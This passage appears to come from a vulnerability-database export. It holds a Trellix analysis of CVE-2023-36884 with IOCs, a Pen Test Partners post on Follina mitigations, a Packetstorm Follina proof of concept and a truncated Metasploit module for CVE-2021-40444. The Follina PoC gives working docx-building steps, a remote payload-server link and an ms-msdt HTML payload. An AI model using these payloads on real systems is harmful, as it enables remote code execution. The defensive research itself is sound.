\n\nServer_Signature: \n\nWgJ3rQ4t6UJG3q/lXzUo9RAADSp1m2PQaonNWi20VF+auR3rkxQXV4g3j7IPQ4OxCclMC5/vYgPpfMIl+RezYETzQIx0qXIYeSnHznrm76WiZMYgsxHkFxPySIJW1f2IzUpEyrdONzhg/odXNBRAjmi5L4E94xI4keXiMaa9D0K4uOBMAuPslJ1wbHiuVKf3wgqu8G809j1jWTmRJ4/kYjsh63+qjyhRTTC1xgqqaMhCndEcHvlHR+nBifGpL3NQM2iyE9RJCc48w55txTcqUZkX9dhab0XZy3iH6v73+lwdB+Y7O2zSXU+lboTiKkarnRx4BvCZUZNuI/JBm3A+KlJvEyqCq8Cg3oUpGv3zxavhHYv2VJXs4DrDFJoNGnhsrDAUARMWjfQ/skPd8QGkf8PfcZJaNmAeTpLbNt8DKe9ZmA5q7mfSp7S6lk8WNxu4+ayK6GRBSN3p4NgtLo85o66Ivowo5jvOVB3iwDPptxs2fgehFqgORY19hbhmoJ3BEMsYOLSgtUSAhuFg4HvCYEQh/LxPnxpH17QMAlyl0Xb/+JoycFyX1rIyegk4q2BIClYeFbFZEsa7qTOWQl32J0urav1WmwGV3ezc7oeaH6AkrTJLTFqePt2FUP7LoBzAb4Fv2RtNkR/bov6WdrNwQO/Di/idBmI7wQFmSzYhs28= \n\nAES: \n\n02630f7bfb8bafcd79ec1c49e1d7184c15d03f662e520f6ee201ae7cd14247e6 \n\nSalt: \n\nbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941 \n\n_ This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. _\n", "cvss3": {}, "published": "2023-07-26T00:00:00", "type": "trellix", "title": "Beyond File Search: A Novel Method", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T00:00:00", "id": "TRELLIX:FC79F74B85714DFB2F725665CE9B700F", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-24T00:00:00", "description": "# The Tale of Two Exploits - Breaking Down CVE-2023-36884 and the Infection Chain\n\nBy [Chintan Shah](<https://www.trellix.com/en-in/about/newsroom/stories/contributors/chintan-shah.html>) \u00b7 August 24, 2023\n\n## Executive Summary\n\nOn July 11 2023, Microsoft released a patch fixing multiple actively exploited RCE vulnerabilities and [disclosed](<https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/>) a phishing campaign conducted by the threat actor, identified as Storm-0978, which targeted entities in Europe and North America. This campaign used a zero-day vulnerability tracked as CVE-2023-36884, a remote code execution vulnerability in windows search files that is exploited via crafted Office Open eXtensible Markup Language (OOXML) documents with specific geopolitical lures related to Ukraine World Congress (UWC). While, there was a [workaround](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884>) suggested to mitigate this vulnerability, on August 8 2023, [Microsoft Office Defense in Depth update](<https://msrc.microsoft.com/update-guide/vulnerability/ADV230003>) was released breaking the exploitation chain which led to RCE through windows search (*.search-ms) files.\n\nHardening of operating systems and several exploit mitigation features have resulted in steady decline in the exploitation and weaponizing of memory corruption vulnerabilities. Abusing features of Microsoft Office has been at the forefront and the top techniques for adversaries to execute targeted attacks. This is fundamentally because of its rich set of features exposing larger attack surface, wider adoption, and ease of exploitation, ultimately becoming a lucrative attack vector. We\u2019ve had many such instances in the past like CVE-2022-30190, [CVE-2021-40444](<https://kcm.trellix.com/corporate/index?page=content&id=KB94876>) and many others where Office documents had been used either as a carrier for other file format exploits or used to link them to the malicious external resources or objects, which in turn exploits vulnerabilities via invoking respective object renderers. Office documents historically also have been used to chain multiple vulnerabilities together to achieve Remote Code Execution (RCE). Previously, we blogged about CVE-2022-37985, an information disclosure vulnerability in Windows Graphics Component, which can be exploited through Office documents, and when chained with other vulnerabilities giving arbitrary write primitives, has potential to achieve code execution. \n\nIn this blog, we will take a deeper look at the malicious OOXML, and embedded Rich Text Format (RTF) document exploit used in targeted attacks against government entities and visualize the attack sequence and chain of exploits. We will also attempt to reconstruct the document lures programmatically using the same technique with sample code and further highlight the Trellix IPS and product coverage against the exploits used in this attack.\n\n## Introduction\n\nIn this attack campaign, threat actors used multiple OOXML documents with the name and hashes: \n\nOverview_of_UWCs_UkraineInNATO_campaign.docx [2400b169ee2c38ac146c67408debc9b4fa4fca5f]\n\nLetter_NATO_Summit_Vilnius_2023_ENG (1).docx [3de83c6298a7dc6312c352d4984be8e1cb698476]\n\n\n\n\n\nFigure 1 \u2013 document lures used in the campaign \n\n\nWhile quickly scanning OOXML lures through in-house built Office file analysis engine, we noticed RTF document embedded inside and on further analysing RTF through the same scanning engine, multiple suspicious indicators were noticed as shown below. This triggered our investigation on the technique used to embed RTF into OOXML and see if we can apply the same method to reconstruct the lures leading to chain of infection.\n\n Figure 2 - Detection for document lures \n\n\nDocument structure of both exploits used in this campaign are similar to the one used in the Follina attack (CVE-2023-30190). However, in the Follina exploit, Object Linking was used to link the OOXML document to the externally hosted HTML file as detailed in our previous blog. While in the OOXML exploiting CVE-2023-36884, **Alternate Format Chunk (AltChunk / aFChunk)** embeds an RTF file within the OOXML. Use of the AltChunk class is indicated by the **w:altChunk** element tag in the document.xml file when the container document is deflated as shown below:\n\n Figure 3 \u2013 document.xml using altChunk to embed malicious RTF \n\n\n## Use of \u201cAlternative Chunk\u201d in CVE-2023-36884\n\nTraditionally, Office exploits used Object Linking and Embedding (OLE) to embed external content into the container application. In this exploit, **altChunk (stands for Alternative Chunk)** is used, which is an OpenXML standard providing the way to merge two documents into a single larger document. The **AltChunk** element indicates the container application to import the content stored in the alternative part of the document (in this case, an RTF document).\n\nThe **altChunk** element specifies the location in the OOXML document for inserting the content of the specified file into the target document. The content type to be inserted and the location of the file is specified by the relationship **Type** and **Target** elements with the same relationship id as used above in **document.xml.rels** within the **/word/_rels** directory as shown in the exploit below. \n\n Figure 4 \u2013 Relationship Target referring embedded RTF \n\n\nAs per the [specifications](<https://learn.microsoft.com/en-us/openspecs/office_standards/ms-oi29500/c391c28f-1b03-4a21-a4f8-4d9cddd4a95c>), the relationship Type should be \u201c**\u2026/relationships/aFChunk**\u201d, as shown above, and the **TargetMode** should be specified as \u201cInternal,\u201d which is missing but Office seems to ignore the attribute and still processes the document. Multiple content types can be imported with this method including application/rtf, application/html, application/text, application/xml, etc, which effectively allows OOXML documents to be used as a carrier for other file format exploits.\n\n## Analysis of embedded RTF (afChunk.rtf)\n\nTaking a deeper look at the embedded RTF document, it has precisely two embedded objects which download additional malware payloads through redirection chains. One of the embedded OLE objects inside the RTF is a linked object indicated by a \u201c**objautlink**\u201d RTF control word followed by \u201c**objupdate**\u201d, which forces the objects / links to update before displaying the contents of the linked object. \n\n Figure 5 \u2013 Embedded object 1 in RTF \n\n\nAdditionally, the embedded object contains the Universal Naming Convention (UNC) path to the external IP, initiating the connection to the externally hosted SMB server to download another file **file001.url** (SHA-1 70560aff35f1904f822e49d3316303877819eef8). This is again the Word document embedding the HTML content with iframe source, which is rendered upon launching the original document.\n\n  \n\n\n\n\n\n\n \n\n\n\n\n\n\nFigure 6 \u2013 View of OLE object using OLE2LINK technique of linking RTF doc \n\n\nWhile another OLE object is also a linked object, with objclass of \u201cxmlfile\u201d and oleclsid of \u201cStdOleLink\u201d object. This effectively means the StdOleLink OLE object is used to link the RTF to an externally hosted XML file. This was one of the widely adopted techniques and was also used in massively exploited CVE-2017-1099. However, this linking feature can still be used in the similar fashion to exploit logic flaws in other renderer components. Once the RTF is launched, connection is initiated to the external IP to retrieve start.xml which is then rendered by [SAX XML Reader 6.0](<https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms764622\\(v=vs.85\\)>) ( msxml6.dll). This retrieved XML file in turn has embedded iframe source pointing to another file RFile.asp in the same path. Part of the infection chain can be visualized below.\n\n Figure 7 \u2013 Embedded object 2 in RTF \n \n Figure 8 \u2013 View of OLE object using OLE2LINK technique of linking RTF doc \n \n Figure 9 \u2013 RTF document initiating connection to retrieve start.xml \n \n Figure 10 - Contents of start.xml containing iframe \n\n\nAs seen in the _RFile.asp_ code below, it starts with the timeout of 30000 seconds and then it loads another iframe contained within which retrieves a .htm file from the same attacker-controlled server 104.234.239.26, which has the dynamically generated file based on the IP address of the victim and the unique id in the path of the HTTP request.\n\n Figure 11 \u2013 Contents of the RFile.asp \n\n\nApparently, the infection chain turns out to be a series of iframe redirects and resumes with the fetching of the .htm file and subsequently search-ms files, and eventually ends up downloading the final payload. The entire infection chain can be very well visualized with following infographic:\n\n Figure 12 \u2013 Visualization of CVE-2023-36884 infection chain \n<https://twitter.com/r00tbsd/status/1679042071477338114> \n\n\n## Can we reconstruct the exploit using URL Moniker and \u201cAltChunk\u201d?\n\nThe below C# sample code uses the **DocumentFormat.OopenXML** package and demonstrates how we can reconstruct the OOXML document with embedded RTF using the \u201caltChunk\u201d class as used by attackers in this campaign. This code will embed _Document1.rtf_ into _Document2.docx_ and will create another file with the name CVE-2023-36884.docx. \n\nTo be able to altChunk the RTF document into OOXML, the code first initializes a unique altChunkId as a relationship id. It then creates the new AlternativeFormatImportPart with the altChunkID and calls OpenXML API **AddAlternativeFormatImportPart** with **AlternativeFormatImportPartType** as the RTF, adding to the main document (CVE-2023-36884.docx). As mentioned in the previous sections, [AlternativeFormatImportPartType](<https://learn.microsoft.com/en-us/dotnet/api/documentformat.openxml.packaging.alternativeformatimportparttype?view=openxml-2.8.1>) is of type enum which specifies content types to be imported.\n\n Figure 13 : AlternativeFormatImportPartType used to import multiple content types \n\n\nSubsequently, after creating the new AltChunk, contents of the Document1.rtf are inserted at the end of the main document (CVE-2023-36884). We believe that the same technique must have been used by authors to build the exploit. \n\nFigure 14: Document1.rtf \n\n\nFigure 15: Document2.docx \n\n\n\n\n\n\n \n Figure 16: Code to insert RTF into DOCX using AltChunk \n \n Figure 17: Reconstructed POC exploit with connection to start.xml initiating the infection chain \n\n\n## Trellix IPS protection and Product Coverage against this attack \n\nTrellix NSP has been one of the most advanced IPS in the security industry, consistently engaged in protecting customers from advanced attacks. Some of the cutting-edge IPS features like **Microsoft Office Deep File Inspection** and **Multi Attack ID Correlation** protect customers against a variety of file format attacks and help correlate multiple low or medium severity alerts in the attack cycle, increasing overall confidence level. [Trellix IPS released](<https://kcm.trellix.com/agent/index?page=content&id=KB96639>) following the detections for protection against this attack.\n\nIPS Attack ID\n\nAttack Name\n\n0x452d8200\n\nHTTP: Microsoft Office Remote Code Execution Vulnerability (CVE-2023-36884)\n\n0x452da500\n\nHTTP: Microsoft Office Post Exploitation Activity I (CVE-2023-36884)\n\n0x452d8300\n\nHTTP: Microsoft Office Post Exploitation Activity (CVE-2023-36884)\n\n \n\n\n### Trellix Product Coverage\n\nProduct \n\nDetection Details \n\nENS-AV \n\nPUP-ILJ \nRTFObfustream.a \nGeneric Trojan.mq \nHTML/Agent.s \nHTML/CVE2023-36884.a \n\nENS-EP \n\nCVE-2023-36884_Office_and_Windows_HTML_Remote_Code_Execution_Vulnerability.md \n\nHX-IOC \n\nSUSPICIOUS LAUNCH OF MSDT.EXE BY OFFICE APPS A (METHODOLOGY) \n\nHX-AV/MG \n\nTrojan.GenericKD.67946770 \nExploit.CVE-2017-0199.02.Gen \nTrojan.GenericFCA.Agent.98791 \nTrojan.GenericFCA.Agent.98790 \n\nNetwork (NX) \n\nNX \nTrojan.Generic.DNS \nTrojan.Generic.DNS \nNX IPS \nFE_Office and Windows HTML CVE-2023-36884 Remote Code Execution Vulnerability \nFE_Office and Windows HTML CVE-2023-36884 Remote Code Execution Vulnerability \nFE_Office and Windows HTML CVE-2023-36884 Remote Code Execution Vulnerability \nFE_Office and Windows HTML CVE-2023-36884 Remote Code Execution Vulnerability \nFE_Office and Windows HTML CVE-2023-36884 Remote Code Execution Vulnerability \nFE_Office and Windows HTML CVE-2023-36884 Remote Code Execution Vulnerability \n\nMVX \n\nFE_Exploit_RTF_CVE20170199_1\\ \nFEC_Exploit_RTF_CVE20170199_1_FEBeta\\ (703874) \nFEC_Exploit_RTF_Generic_1_FEBeta\\ (703875) \nFEC_Exploit_RTF_Generic_2_FEBeta\\ (703876) \nFEC_Trojan_HTML_Generic_64_FEBeta\\ (703877) \nSuspicious Network Activity\\ (10405) \nTrojan.Generic.MVX\\ (43183) \n\nHELIX \n\nWINDOWS METHODOLOGY [Office Suspicious Child Process] (1.1.2497) \nWINDOWS METHODOLOGY [Impacket Secretsdump] (1.1.3336) \nIMPACKET OBFUSCATION [WmiExec Commands](1.1.3942) \n\n \n\n\n## Conclusion \n\n## \n\nMicrosoft Office continues to be the top target for attackers, especially when it comes to abusing features and exploiting design and logic flaws. As the native memory corruption flaws gradually decline along with the inherent challenges in weaponizing them, this feature rich application, with its wider attack surface, provides an attacker a path of least resistance. In one of our previous blogs, we predicted this exploitation trend, and CVE-2023-36884 is yet another validation of that. We believe this trend is going to continue with vulnerabilities in the application features and their easy exploitation remaining a challenge for organizations. Consequently, endpoint and network security solutions will have to continuously evolve to address those challenges. By applying secure application design and development, we can certainly break the exploitation chain and remain protected against these attacks. \n\n## Indicators of Compromise (IOCs)\n\n### Hashes of malicious files\n\nMD5 hash \n\nFilename \n\n227874863036b8e73a3894a19bd25a0 \n\nOverview_of_UWCs_UkraineInNATO_campaign.docx \n\n00ad6d892612d1fc3fa41fdc803cc0f3 \n\nLetter_NATO_Summit_Vilnius_2023_ENG(1).docx \n\n3ca154da4b786a7c89704d0447a03527 \n\nafchunk.rtf \n\n0c72b2479316b12073d26c6ed74d3bdc \n\nstart.xml \n\n7bbe0e887420d55e43ce1968932e1736 \n\nRFile.asp \n\ne65a1828d6afe3f27b4ec7ec1a2fee20 \n\n1111.htm \n\n510823c639f6a608b59d78b71be50aab \n\n2222.chm \n\nf49a0d153660cf95d7113c1d65e176ff \n\nINDEX.htm \n\nf0cd84693a7481834fa021496c3ec9e9 \n\nfileH.mht \n\n0fff39ae5d049967c2c74db71eeda904 \n\nex001.url \n\n54cfc7f45302d9793af97bd7d33c6e9a \n\nfile001.vbs \n\n8639c28a3fba0912fcf563b31f97d300 \n\ntestdll.dll \n\n476274dc8efda182acd47ac0a5362a5a \n\nfile001.vbs \n\ne6f8b0299ca4d44bf09dc4e443fb503c \n\ntestdll64.cpl \n\na38aa3eaf3ffb79fbd50f503ccea2f25 \n\nfileH.htm \n\nfe8a942370a6881ee9d93f907cae7aa5 \n\nfile1.mht \n\n7fd97c71ef08a0f066ce4fbf465d1062 \n\nfile1.htm \n\n26a6a0c852677a193994e4a3ccc8c2eb \n\nfile001.url \n\n218a069f4711d84100062d01a41d960f \n\nex001.zip \n\n76f918cbfa4075101a61aac74582f755 \n\ncalc.exe \n\n_ This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. _\n", "cvss3": {}, "published": "2023-08-24T00:00:00", "type": "trellix", "title": "The Tale of Two Exploits - Breaking Down CVE-2023-36884 and the Infection Chain", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-1099", "CVE-2021-40444", "CVE-2022-30190", "CVE-2022-37985", "CVE-2023-30190", "CVE-2023-36884"], "modified": "2023-08-24T00:00:00", "id": "TRELLIX:D3CC9DD7452C6A1D346229DE526BBE46", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/breaking-down-cve-2023-36884-and-the-infection-chain.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "pentestpartners": [{"lastseen": "2022-07-13T15:54:57", "description": "\n\n_Disclaimer: I know this isn\u2019t a unique post on the subject, and that many other outlets are covering it, but this zero-day is so serious that it needs as much coverage as possible. It simply needs shouting about._\n\n**Updated 06/06/2022 following advice from Microsoft&#x27;s [@reybango](<https://twitter.com/reybango>).**\n\nThe vulnerability was reported to Microsoft by Shadow Chaser Group member [@CrazymanArmy](<https://twitter.com/crazymanarmy>).\n\n### What is it?\n\nIt exists in Microsoft Windows Support Diagnostic Tool (MSDT), enabling remote code execution. It\u2019s been assigned a [CVE](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190>) and Microsoft provide details here [CVE-2022-30190](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>).\n\nMicrosoft says:\n\n\n\nA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user\u2019s rights.\n\n\n\nPut more simply; it makes Arbitrary Code Execution attacks possible when previewing or opening documents.\n\n### How do I deal with it?\n\nThere are two protocol handlers that need to be unregistered: **ms-msdt** and **search-ms**. \n\n\n### ms-msdt\n\nMicrosoft were quick to publish a workaround to prevent attacks that exploit the vulnerability: <https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>\n\nThe advice in that post is to disable the MSDT URL Protocol:\n\n 1. Run Command Prompt as Administrator.\n 2. To back up the registry key, execute the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201c\n 3. Execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n### search-ms\n\n[@hackerfantastic](<https://twitter.com/hackerfantastic>) published advice [here](<https://twitter.com/hackerfantastic/status/1531793396423176193>). He said &quot;Note that this is not CVE-2022-30190 but uses the same OLEObject vector as CVE-2021-40444 and CVE-2022-30190, however as it requires additional user interaction and an outbound UNC connection the CVSS risk score is reduced. It is also currently unpatched but mitigation steps work&quot;.\n\nThe steps are:\n\n 1. Run Command Prompt as Administrator.\n 2. To back up the registry key, execute the command \u201creg export HKEY_CLASSES_ROOT\\search-ms filename\u201c\n 3. Execute command \u201creg delete HKEY_CLASSES_ROOT\\search-ms /f\u201d.\n\nAs with all workarounds it\u2019s on you to vet and investigate before deploying them.\n\nThere\u2019s more detail from the [nao_sec](<https://twitter.com/nao_sec>) cyber security research team [here](<https://twitter.com/nao_sec/status/1530196847679401984>).\n\n\n\nSANS have produced an analysis and remediation video [here](<https://www.youtube.com/watch?v=vHW_hb2m_pw>).\n\n * 19:20 Mitigations\n * 27:50 Detecting\n\n### Why is it called Follina?\n\nHere&#x27;s [why](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>), thanks [@GossiTheDog](<https://twitter.com/GossiTheDog>)!\n\nThe post [Follina 0day exploit. Malicious code execution in Office docs](<https://www.pentestpartners.com/security-blog/follina-0day-exploit-malicious-code-execution-in-office-docs/>) first appeared on [Pen Test Partners](<https://www.pentestpartners.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T05:38:30", "type": "pentestpartners", "title": "Follina 0day exploit. Malicious code execution in Office docs", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-01T05:38:30", "id": "PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93", "href": "https://www.pentestpartners.com/security-blog/follina-0day-exploit-malicious-code-execution-in-office-docs/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-05-31T17:41:58", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T00:00:00", "type": "packetstorm", "title": "Microsoft Office MSDT Follina Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44444", "CVE-2022-30190"], "modified": "2022-05-31T00:00:00", "id": "PACKETSTORM:167317", "href": "https://packetstormsecurity.com/files/167317/Microsoft-Office-MSDT-Follina-Proof-Of-Concept.html", "sourceData": "`# POC CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina \n \n> Info : [New Microsoft Office zero-day used in attacks to execute PowerShell](https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/) \n \n## Summary \n \nOn the 29th of May 2022, the Nao_Sec team, an independent Cyber Security Research \nTeam, discovered a malicious Office document shared on Virustotal. This document is \nusing an unusual, but known scheme to infect its victims. The scheme was not detected as \nmalicious by some EDR, like Microsoft Defender for Endpoint. This vulnerability could lead to \ncode execution without the need of user interaction, as it does not involve macros, except if the \nProtected View mode is enabled. There is no CVE number attributed yet. \n \n \n## Technical Details \n \nThe vulnerability is being exploited by using the MSProtocol URI scheme to load some code. \nAttackers could embed malicious links inside Microsoft Office documents, templates or emails \nbeginning with ms-msdt: that will be loaded and executed afterward without user interaction \n- except if the Protected View mode is enabled. Nevertheless, converting the document to \nthe RTF format could also bypass the Protected View feature. \n \n## Proof of Concept \n \nMS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme \"ms-msdt:\" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters). \n \nThe result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros). \n \nHere are the steps to build a Proof-of-Concept docx: \n \n1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx. \n \n2. Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip). Modify the XML tag `<Relationship>` with attribute \n \n``` \nType=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" \n``` \n \nand `Target=\"embeddings/oleObject1.bin\"` by changing the `Target` value and adding attribute `TargetMode`: \n \n``` \nTarget = \"http://<payload_server>/payload.html!\" \nTargetMode = \"External\" \n``` \n \nNote the Id value (probably it is \"rId5\"). \n \n3. Edit `word/document.xml`. Search for the \"<o:OLEObject ..>\" tag (with `r:id=\"rId5\"`) and change the attribute from `Type=\"Embed\"` to `Type=\"Link\"` and add the attribute `UpdateMode=\"OnCall\"`. \n \nNOTE: The created malicious docx is almost the same as for [CVE-2021-44444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444). \n \n4. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at `http://<payload_server>/payload.html`: \n \n``` \n<!doctype html> \n<html lang=\"en\"> \n<body> \n<script> \n//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times \nwindow.location.href = \"ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \\\"\"; \n</script> \n \n</body> \n</html> \n``` \n \nNote that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason). \n \n## BONUS (0-click RTF version) \n \nIf you also add these elements under the `<o:OLEObject>` element in `word/document.xml` at step 3: \n \n``` \n<o:LinkType>EnhancedMetaFile</o:LinkType> \n<o:LockedField>false</o:LockedField> \n<o:FieldCodes>\\f 0</o:FieldCodes> \n``` \n \nthen it'll work as RTF also (open the resulting docx and save it as RTF). \n \nWith RTF, there is no need to open the file in Word, it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks. \n \n## Sources : \n \n- https://nao-sec.org/about \n- https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection \n- https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 \n- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167317/msdt-poc.txt"}, {"lastseen": "2021-12-09T15:33:23", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-09T00:00:00", "type": "packetstorm", "title": "Microsoft Office Word MSHTML Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-09T00:00:00", "id": "PACKETSTORM:165214", "href": "https://packetstormsecurity.com/files/165214/Microsoft-Office-Word-MSHTML-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Office Word Malicious MSHTML RCE', \n'Description' => %q{ \nThis module creates a malicious docx file that when opened in Word on a vulnerable Windows \nsystem will lead to code execution. This vulnerability exists because an attacker can \ncraft a malicious ActiveX control to be used by a Microsoft Office document that hosts \nthe browser rendering engine. \n}, \n'References' => [ \n['CVE', '2021-40444'], \n['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'], \n['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'], \n['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'], \n['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'], \n['URL', 'https://github.com/klezVirus/CVE-2021-40444'] \n], \n'Author' => [ \n'lockedbyte ', # Vulnerability discovery. \n'klezVirus ', # References and PoC. \n'thesunRider', # Official Metasploit module. \n'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop-CyberSecurity - code base contribution and refactoring. \n], \n'DisclosureDate' => '2021-09-23', \n'License' => MSF_LICENSE, \n'Privileged' => false, \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'Payload' => { \n'DisableNops' => true \n}, \n'DefaultOptions' => { \n'FILENAME' => 'msf.docx' \n}, \n'Targets' => [ \n[ \n'Hosted', {} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [UNRELIABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true]) \n]) \nregister_advanced_options([ \nOptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]), \n]) \nend \n \ndef bin_to_hex(bstr) \nreturn(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join) \nend \n \ndef cab_checksum(data, seed = \"\\x00\\x00\\x00\\x00\") \nchecksum = seed \n \nbytes = '' \ndata.chars.each_slice(4).map(&:join).each do |dword| \nif dword.length == 4 \nchecksum = 